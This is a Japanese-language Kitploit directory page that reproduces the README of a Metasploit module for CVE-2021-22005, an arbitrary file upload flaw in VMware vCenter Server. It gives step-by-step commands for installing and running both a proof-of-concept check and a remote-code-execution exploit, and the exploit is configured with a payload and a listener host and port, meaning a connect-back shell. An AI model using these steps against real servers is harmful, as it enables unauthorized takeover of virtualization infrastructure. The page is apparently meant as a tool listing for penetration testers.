Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-22005 — CVE-2021-22005 VMware vCenter任意ファイルアップロード脆弱性のMetasploitモジュール。概念実証とリモートコード実行エクスプロイト付き。 | Kitploit
ツール/GitHubGitHub/tiagob0b/cve-2021-22005
エクスプロイトフレームワーク脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストペイロード開発
GitHubtiagob0b/cve-2021-22005

CVE-2021-22005

CVE-2021-22005 VMware vCenter任意ファイルアップロード脆弱性のMetasploitモジュール。概念実証とリモートコード実行エクスプロイト付き。

リポジトリを見る
2324年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-22005-metasploit

CVE-2021-22005 VMware vCenter Server の任意ファイルアップロードの脆弱性に関する metasploit スクリプト(POC/EXP)です。

POC の準備

root@kitploit:~
git clone https://github.com/TaroballzChen/CVE-2021-22005-metasploit
cd CVE-2021-22005-metasploit
mkdir -p ~/.msf4/modules/auxiliary/scanner/http
cp vmware_vcenter_server_file_upload_poc.py ~/.msf4/modules/auxiliary/scanner/http/
chmod +x ~/.msf4/modules/auxiliary/scanner/http/vmware_vcenter_server_file_upload_poc.py
msfconsole

POC の使い方

root@kitploit:~
set rhost <vuln ip/host>
set port <vuln port>
set ssl <default: true for https>
exploit

結果

このスクリプトは、base64 でエンコードされた「Could be vuln by CVE-2021-22005」というテキストを含む無害な JSP をアップロードします。 poc

EXP の準備

root@kitploit:~
git clone https://github.com/TaroballzChen/CVE-2021-22005-metasploit
cd CVE-2021-22005-metasploit
mkdir -p ~/.msf4/modules/exploits/linux/http
cp vmware_vcenter_server_file_upload_to_rce.py ~/.msf4/modules/exploits/linux/http/
chmod +x ~/.msf4/modules/exploits/linux/http/vmware_vcenter_server_file_upload_to_rce.py
msfconsole

エクスプロイトの使い方

root@kitploit:~
set target <target>
set PAYLOAD <payload>
set rhost <vuln ip>
set port <vuln port>
set LHOST <list host ip>
set LPORT <list port>
exploit

エクスプロイト

exploit

参考

  • https://github.com/5gstudent/CVE-2021-22005-
  • https://github.com/rwincey/CVE-2021-22005
ツールをダウンロード